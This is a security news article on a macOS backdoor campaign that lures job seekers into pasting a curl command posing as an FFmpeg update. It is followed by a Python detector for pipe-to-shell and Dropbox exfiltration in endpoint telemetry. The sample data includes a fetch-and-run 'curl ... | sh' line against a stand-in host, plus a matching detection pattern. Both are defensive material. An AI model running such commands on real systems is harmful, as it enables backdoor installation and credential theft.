A new backdoor campaign is targeting Mac users, tricking them into installing malicious software disguised as an FFmpeg update. This attack begins with fake job offers on LinkedIn.
Attackers pose as recruiters, luring victims to a specialized website for a “job assessment” and video introduction. The site then claims camera/microphone access is blocked, prompting a fake FFmpeg “update.”
To “fix” this, victims are instructed to run a `curl` command in their Terminal. According to Jamf, this command downloads a script that installs a backdoor and a decoy application; the malware is known as FlexibleFerret.
The decoy app displays a fake Chrome window requesting camera access, followed by a password prompt. Any credentials entered are sent directly to the attackers’ Dropbox account, compromising user data.
Organizations are urged to warn employees about unsolicited job assessments and Terminal-based instructions for “solving problems.” This is a crucial step to protect against such social engineering tactics.
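User awareness is the first line of defence, but the two behaviours described above (a `curl` command piped into a shell from the Terminal, and credentials leaving through Dropbox) are also detectable from endpoint telemetry. The following detector is an added example, not code from Jamf or from the article: it runs over a constructed batch of JSON events in a hypothetical schema (`type`, `session`, `process`, `cmdline`, `dest_host`) and flags sessions showing either pattern, with a higher-confidence verdict when both appear in the same session. The process allowlist for Dropbox is an assumption for the example.

```python
import json
import re

# Constructed sample endpoint telemetry (not real data): one JSON event per
# line, in a simplified hypothetical schema used only for this example.
SAMPLE_EVENTS = """
{"type": "exec", "session": "s1", "process": "bash", "cmdline": "curl -fsSL https://example.invalid/update.sh | sh"}
{"type": "exec", "session": "s1", "process": "bash", "cmdline": "ls -la"}
{"type": "net", "session": "s1", "process": "ffmpeg_update", "dest_host": "content.dropboxapi.com"}
{"type": "net", "session": "s2", "process": "Dropbox", "dest_host": "api.dropboxapi.com"}
{"type": "exec", "session": "s3", "process": "zsh", "cmdline": "brew upgrade ffmpeg"}
""".strip().splitlines()

# A downloader whose output is piped straight into a shell, the pattern the lure
# asks the victim to type; legitimate package managers do not match.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(sudo\s+)?(ba|z)?sh\b")
DROPBOX_HOSTS = ("dropboxapi.com", "dropbox.com")
# Processes expected to talk to Dropbox; assumption for this example.
DROPBOX_ALLOWLIST = {"Dropbox"}

def is_pipe_to_shell(cmdline):
    return bool(PIPE_TO_SHELL.search(cmdline))

def is_suspicious_dropbox_egress(process, dest_host):
    # Dropbox traffic from a process that is not the Dropbox client itself.
    return dest_host.endswith(DROPBOX_HOSTS) and process not in DROPBOX_ALLOWLIST

def analyse(lines):
    """Return {session: [finding, ...]} for events matching either rule."""
    findings = {}
    for line in lines:
        ev = json.loads(line)
        if ev["type"] == "exec" and is_pipe_to_shell(ev["cmdline"]):
            findings.setdefault(ev["session"], []).append("curl-pipe-to-shell: " + ev["cmdline"])
        elif ev["type"] == "net" and is_suspicious_dropbox_egress(ev["process"], ev["dest_host"]):
            findings.setdefault(ev["session"], []).append(
                f"non-Dropbox process {ev['process']} -> {ev['dest_host']}")
    return findings

def high_confidence_sessions(findings):
    """Sessions showing both the install lure and the exfiltration channel."""
    return sorted(s for s, f in findings.items()
                  if any(x.startswith("curl-pipe") for x in f)
                  and any(x.startswith("non-Dropbox") for x in f))

if __name__ == "__main__":
    found = analyse(SAMPLE_EVENTS)
    for session, items in found.items():
        print(session, items)
    print("high confidence:", high_confidence_sessions(found))
```

On a real fleet the same two rules would be fed from a process-execution and network-connection source such as an EDR or macOS Endpoint Security client; the allowlist and host list would need tuning for environments where Dropbox is sanctioned.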
The deceptive tactics used in the fake FFmpeg update campaign, leveraging social engineering to deploy backdoors, mirror a growing sophistication in cybercriminal methods designed to bypass security.
This trend is further exemplified by platforms like Matrix Push C2, which uses fileless, cross-platform phishing via browser notifications. Such methods establish persistent communication channels for attackers.
Both campaigns highlight an ongoing shift where threat actors seek to steal sensitive credentials and financial data, employing innovative approaches to circumvent traditional defenses and remain undetected.
For additional context on how new command-and-control platforms operate to facilitate fileless phishing and data theft, refer to this detailed analysis: Matrix Push C2 uses browser notifications for fileless, cross-platform phishing attacks.